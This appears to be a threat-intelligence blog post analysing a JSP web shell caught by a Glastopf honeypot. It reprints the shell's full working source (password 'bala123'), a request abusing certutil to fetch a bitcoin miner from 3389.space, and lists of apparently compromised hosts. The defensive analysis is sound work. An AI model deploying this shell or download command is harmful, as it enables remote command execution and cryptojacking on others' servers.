Glastopf, the web server honeypot, received a couple generic probe attempts from 27.210.190.226, then immediately received a PUT request for “/indexweb4.jsp/” (VirusTotal report).
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%>
<%!public static String excuteCmd(String c)
{
StringBuilder line = new StringBuilder();
try
{
Process pro = Runtime.getRuntime().exec(c);
BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
String temp = null;
while ((temp = buf.readLine()) != null)
{
line.append(temp+"\\n");
}
buf.close();
}
catch (Exception e)
{
line.append(e.getMessage());
}
return line.toString();
}
%>
<%
if("bala123".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd")))
{
out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");
}
else
{
out.println(":-)");
}
%>
Shortly afterwards, Glastopf registered a request to that JSP file:
/indexweb4.jsp?cmd=cmd.exe%20/c%20certutil.exe%20-urlcache%20-split%20-f%20hxxp://3389.space/nw/vm.exe%20c:/windows/inf/sst.exe&pwd=bala123
This would abuse certutil.exe to download an arbitrary file, in this case vm.exe from 3389.space. Certutil is a Windows utility designed to help manage certificates, but it’s great at downloading files in a proxy-aware way. Virus Total reports that vm.exe is a bitcoin miner.
Back in May, @sec_chick reported this behavior. At that time, @sec_chick reports that it was downloading a different EXE, another bitcoin minter.
Sites that seem to have been infected (search 776 indexweb4.jsp):
- hxxp://www.tongshengdianli.com/
- hxxp://74.208.15.120/
- hxxp://221.10.166.177/
- hxxp://114.255.185.211/
74.208.15.120 is in rough shape. Someone who has used this same tool to exploit it has dropped a webshell in there in the top directory, along with a couple of pieces of malware titled pr.exe and cmd.exe.
Similarly, 221.10.166.177 has a ton of material dumped there by someone experimenting. Notably qdww5004.txt, which looks to be a webshell or similar, related to cnhonkerarmy. 114.255.185.211 has become someone’s repository of terrible executables, Chrome warns about it upon visiting.
Google finds other sites that seem to be affected, or previously affected. A surprising number redirect to hxxps://www.cjb.net/ now…
3389.space is a domain associated with other malicious campaigns:
- New Jenkins Campaign Hides Malware, Kills Competing Crypto-Miners
- Talos report related to 3389.space, similar to the above, but slightly broader
- A report on ss.exe, served from the domain
Other reports of similar “indexweb4.jsp” abuse:
- https://www.abuseipdb.com/check/112.226.252.84
- https://k-anz.hatenablog.com/entry/2018/07/15/102648 - someone who ended up writing a very similar article, back in September